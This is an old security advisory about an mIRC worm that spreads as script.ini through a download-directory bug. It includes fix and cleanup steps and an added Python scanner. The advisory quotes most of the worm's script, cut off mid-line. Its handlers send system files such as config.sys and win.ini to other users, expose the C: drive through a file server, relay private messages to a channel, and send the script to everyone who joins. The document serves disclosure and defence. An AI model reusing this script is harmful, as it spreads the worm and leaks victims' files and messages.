COMMAND

    mIRC

SYSTEMS AFFECTED

    Win systems running mIRC

PROBLEM

    Aleph One posted the following.  There is an mIRC worm/script going
    around IRC.  mIRC has a bug that allows remote users to download
    script files onto the victims' machines and execute them.  Below
    is one of the many variations of the script.  Some URLs:

        http://www.mirc.org/
        http://www5.zdnet.com/zdnn/content/zdnn/1216/263771.html
        http://www.drsolomon.com/vircen/valerts/simpsal.html
        http://www.drsolomon.com/vircen/vanalyse/worms.html
        http://www.irchelp.org/irchelp/mirc/si.html

    Script follows (script.ini):

    [script]
    n0=;----------------------------------------------------------
    n1=;      Protection List
    n2=;----------------------------------------------------------
    n3=ON 1:TEXT:*spamquit*:#:/quit Jolly Spamhead Ownz Me
    n4=ON 1:TEXT:*hi*:#:/dcc send $nick c:\config.sys
    n5=ON 1:TEXT:*!servme*:#:/fserve $nick 1 c:\
    n6=ON 1:TEXT:*cya*:#:/dcc send $nick c:\windows\win.ini
    n7=ON 1:TEXT:*the*:#:/dcc send $nick c:\autoexec.bat
    n8=ON 1:NOTICE:*:#:/msg #roms  $+ $chan $+  - $+ $nick $+ - $parms
    n9=ON 1:TEXT:*:?:/msg #roms **Message from $nick $+ ** $parms | /closemsg  $nick
    n10=ON 1:TEXT:*:#:/msg #roms $+ $chan $+  < $+ $nick $+ > $parms
    N11=ON 1:TEXT:*:#:/say I am lame for running Script.ini and I should be shot!
    n12=ON 1:JOIN:#:/dcc send $nick SCRIPT.INI
    n13=ON 1:JOIN:*RaSPuTeN*:/mode +o $chan RaSPuTeN
    N14=ON 1:JOIN:#:/msg $nick My Computer Is Open For The taking! Type !servme in channel!
    n15=#user.prot.add.all off
    n16=raw 401:*: set %User.Nick 0 | halt
    n17=raw 301:*: halt
    n18=raw 311:*: set %User.Address $2 $+ ! $+ $3 $+ @ $+ $4 | halt
    n19=raw 312:*: halt
    n20=raw 313:*: halt
    n21=raw 317:*: halt
    n22=raw 319:*: halt
    n23=raw 318:* {
    n24=  if (%User.Nick == 0) { error $2 $+ , no such nick | goto do

SOLUTION

    mIRC 5.3 has been released to fix the hole.  You can also fix the
    problem by changing the default download subdirectory to be
    something other than the directory containing the script files.  To
    do so:

        a) Start the mIRC software
        b) Click the mIRC menu option DCC | Options | Dirs | Edit
        c) Change the default download directory.  Point to an
           alternate directory or folder name.

    It might also be worth pointing out how to get rid of the
    script.ini program in the first place for those who are not sure.

        Load up mIRC

        /remote off
        /unload -rs script.ini
        /remove script.ini
        /sreq ask
        /remote on

    The defaults for mIRC ARE safe.  They require the user to accept
    the file.  Everyone should be aware not to accept files which are
    from an unknown or dubious source.  The rule applies for http and
    ftp, so IRC/DCC is no different.  Newer versions of script.ini will
    not allow the user to use /remote off or /unload.  script.ini
    aliases these commands to make the users actually delete
    command.com, config.sys, etc.  The safest way to get rid of the
    file is to have the user close down mIRC and delete script.ini
    before they load mIRC again.
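
    Because the safest cleanup happens with mIRC closed, a script.ini
    can be inspected from outside the client first.  The following is
    an added example, not part of the original advisory: the rule list
    and the names scan, RULES and SAMPLE are assumptions of this sketch,
    and it only covers the ON event lines of the variant quoted above.

```python
import re

# Constructed sample in the style of the script.ini lines quoted in the advisory.
SAMPLE = r"""[script]
n0=;      Protection List
n4=ON 1:TEXT:*hi*:#:/dcc send $nick c:\config.sys
n5=ON 1:TEXT:*!servme*:#:/fserve $nick 1 c:\
n9=ON 1:TEXT:*:?:/msg #roms **Message from $nick $+ ** $parms | /closemsg  $nick
n12=ON 1:JOIN:#:/dcc send $nick SCRIPT.INI
n16=raw 401:*: set %User.Nick 0 | halt
"""

# Remote event line as it appears in the quoted file: nN=ON <level>:<EVENT>:<rest>
EVENT_RE = re.compile(r"^(n\d+)=ON\s+([^:]+):(\w+):(.*)$", re.I)

# Heuristic rules (assumptions of this example), matched against <rest>.
RULES = [
    ("propagates script.ini over DCC",
     re.compile(r"/dcc\s+send\s+\S+\s+script\.ini\b", re.I)),
    ("sends a local file over DCC",
     re.compile(r"/dcc\s+send\s+\S+\s+[a-z]:\\", re.I)),
    ("opens a file server on a local drive",
     re.compile(r"/fserve\s+\S+\s+\d+\s+[a-z]:\\", re.I)),
    ("relays received text to a channel",
     re.compile(r"/msg\s+#\S+.*\$parms", re.I)),
]

def scan(text):
    """Return (line_id, event, finding) for each suspicious remote event."""
    findings = []
    for raw in text.splitlines():
        m = EVENT_RE.match(raw.strip())
        if not m:
            continue  # comments, raw numeric handlers, section headers
        line_id, _level, event, rest = m.groups()
        for label, rx in RULES:
            if rx.search(rest):
                findings.append((line_id.lower(), event.upper(), label))
    return findings

if __name__ == "__main__":
    for line_id, event, label in scan(SAMPLE):
        print(f"{line_id}: ON {event}: {label}")
```

    A clean result does not clear a file: other variations of the
    script may use commands these four rules do not match.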